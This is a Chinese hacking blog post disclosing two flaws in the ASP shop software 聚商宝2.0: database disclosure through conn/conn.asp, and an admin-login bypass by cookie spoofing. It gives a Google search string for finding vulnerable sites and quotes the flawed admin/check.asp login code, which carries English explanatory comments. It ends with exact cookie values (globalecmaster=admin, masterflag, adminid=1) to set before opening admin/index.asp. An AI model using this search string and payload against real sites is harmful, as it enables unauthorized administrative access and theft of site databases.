FROM http://www.st999.cn/blog BY 久久久电脑
程序:聚商宝2.0
下载:http://down.chinaz.com/soft/21754.htm
google关键字:intext:技术支持:奔明科技 聚商宝
前几天搞站的时候遇到了个程序叫聚商宝,把源码下载过来了,今天才有时间简单的看了看。。。
漏洞:暴库以及后台cookies欺骗
1)直接访问conn/conn.asp 暴出数据库地址,下载,解密,登录后台
2)cookies欺骗:问题出在admin文件夹下的check.asp文件中,相关代码片段如下:
' Admin login handler (admin/check.asp) as quoted in the post: reads the
' submitted form fields, hashes the password and validates the CAPTCHA
' before the database lookup that follows this block.
dim uid,upwd
' Username taken straight from the POST body. Replace_Text is a helper
' defined elsewhere in the application; its filtering is not visible on
' this page, so whether it neutralises quote characters for the SQL that is
' later built from uid is unconfirmed -- TODO confirm against the helper.
uid=Replace_Text(Request.Form("userid"))
' 16-character MD5 of the submitted password (no salt visible here); it is
' later compared with the stored value inside a string-built WHERE clause.
upwd=md5(Replace_Text(Request.Form("password")),16)
Verifycode=Replace_Text(request.Form("verifycode"))
' A non-numeric CAPTCHA value is logged (Logerr, defined elsewhere) and
' rejected. ErroFy renders the error page and calls Response.End, so the
' request does not continue past this point in that case.
if not isnumeric(Verifycode) then
Call Logerr()
Call ErroFy()
end if
' The CAPTCHA must match the value kept server-side in Session("SafeCode");
' on mismatch the error page is rendered and the response ended.
if Cint(Verifycode)<>Session("SafeCode") then
Call ErroFy()
' ErroFy: writes the "verification code wrong" table and terminates the
' response with Response.End. It is declared inside this If block; the
' Call above presumably works because VBScript resolves procedure
' declarations independently of their position, but the snippet may also
' have been re-ordered by the post's author -- confirm against the file.
Sub ErroFy()
response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
response.write"<TR>"
response.write"<TH class=tableHeaderText colSpan=2 height=25>出现错误提示</TH>"
response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>验证码错误!</div></td></tr>"
response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='login.asp'><< 返回上一页</a></td>"
response.write"</tr>"
response.write"</table>"
Response.End()
End Sub
else
' Credential lookup. The WHERE clause is assembled by string concatenation
' from uid and upwd, so correctness of quote handling rests entirely on
' Replace_Text (not shown here); a parameterised ADODB.Command would remove
' that dependency. The recordset is opened with cursor/lock type 1,1
' (keyset, read-only).
Set rs=server.createobject("adodb.recordset")
sqltext="select * from benming_master where Username='" & uid & "' and [PassWord]='" & upwd & "'"
rs.open sqltext,conn,1,1
' Eof And Bof together mean the recordset is empty: no matching account.
If Rs.Eof And Rs.Bof Then
response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
response.write"<TR>"
response.write"<TH class=tableHeaderText colSpan=2 height=25>出现错误提示</TH>"
response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>登陆名或密码不正确!</div></td></tr>"
response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='login.asp'><< 返回上一页</a></td>"
response.write"</tr>"
response.write"</table>"
else
' Login state is three plain cookies copied from the matching row; no
' server-side session marker is set and the values are neither signed nor
' bound to the Session object (which this same page already uses for
' SafeCode). Nothing on this page ties the cookies to a completed login,
' which is the "cookies 欺骗" issue the post describes: the post reports
' that admin/index.asp accepts such cookies as-is. Keeping the admin flag
' in Session and re-checking it on every admin page, or signing the cookie
' values server-side, would close that gap.
Response.Cookies("globalecmaster")=rs("username")
Response.Cookies("masterflag")=rs("flag")
Response.Cookies("adminid")=rs("id")
' Last-login bookkeeping; this UPDATE is likewise string-built from uid and
' from getIP() (defined elsewhere), so the same quoting caveat applies.
LastLogin=Date()
LastLoginIP=getIP()
sql="update benming_master set LastLogin='"&LastLogin&"',LastLoginIP='"&LastLoginIP&"' where username='"&uid&"'"
conn.execute(sql)
response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
response.write"<TR>"
response.write"<TH class=tableHeaderText colSpan=2 height=25>登陆成功提示</TH>"
response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>成功通过网站后台管理员身份认证!<br><br>2秒后自动进入后台...</div></td></tr>"
response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='index.asp'>进入后台管理</a></td>"
response.write"</tr>"
response.write"</table>"
' The HTML below (outside the script delimiters) redirects the browser to
' index.asp after two seconds.
%>
<meta HTTP-EQUIV=refresh Content='2;url=index.asp'>
<%
end if
rs.close
set rs=nothing
end if
利用方法:用啊D直接访问后台,修改如下cookie,然后访问admin/index.asp登录。
globalecmaster=admin; masterflag=01%2C%2002%2C%2003%2C%2004%
2C%2005%2C%2006%2C%2007%2C%2008%2C%2009%2C%20010; adminid=1